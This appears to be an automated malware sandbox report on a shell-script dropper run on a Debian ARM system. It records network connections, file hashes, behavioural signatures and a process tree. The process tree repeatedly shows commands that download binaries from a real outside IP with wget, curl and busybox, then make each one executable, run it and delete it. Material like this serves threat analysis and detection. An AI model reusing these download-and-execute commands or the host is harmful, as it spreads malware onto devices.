[/bin/busybox wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/chmod
[chmod 777 VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx
[./VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/rm
[rm VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| US | 151.101.1.91:443 | tcp | |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| GB | 195.181.164.15:443 | tcp | |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 01:00
Reported
2024-11-21 01:03
Platform
debian9-armhf-20240611-en
Max time kernel
30s
Max time network
57s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | N/A |
| N/A | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | N/A |
| N/A | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | N/A |
| N/A | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | N/A |
| N/A | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | N/A |
| N/A | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | N/A |
| N/A | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | N/A |
| N/A | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | N/A |
| N/A | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | N/A |
| N/A | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | N/A |
| N/A | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | N/A |
| N/A | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | N/A |
| N/A | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | N/A |
| N/A | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | N/A |
| N/A | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | N/A |
| N/A | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | N/A |
| N/A | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | N/A |
| N/A | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | N/A |
| N/A | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | N/A |
| N/A | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | N/A |
| N/A | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | N/A |
| N/A | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | N/A |
| N/A | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | N/A |
| N/A | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | N/A |
| N/A | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | N/A |
| N/A | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | N/A |
| N/A | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | N/A |
| N/A | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | /usr/bin/curl | N/A |
Processes
/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh
[/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/chmod
[chmod 777 YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN
[./YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/rm
[rm YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/usr/bin/wget
[wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/chmod
[chmod 777 Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e
[./Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/rm
[rm Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/usr/bin/wget
[wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/chmod
[chmod 777 pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc
[./pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/rm
[rm pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/usr/bin/wget
[wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/chmod
[chmod 777 FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ
[./FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/rm
[rm FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/chmod
[chmod 777 ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy
[./ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/rm
[rm ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/usr/bin/wget
[wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/chmod
[chmod 777 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc
[./1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/rm
[rm 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/usr/bin/wget
[wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/chmod
[chmod 777 VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx
[./VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/rm
[rm VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/usr/bin/wget
[wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/chmod
[chmod 777 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH
[./81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/rm
[rm 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/usr/bin/wget
[wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/chmod
[chmod 777 FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3
[./FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/rm
[rm FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/usr/bin/wget
[wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/chmod
[chmod 777 Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk
[./Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/rm
[rm Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/usr/bin/wget
[wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/usr/bin/curl
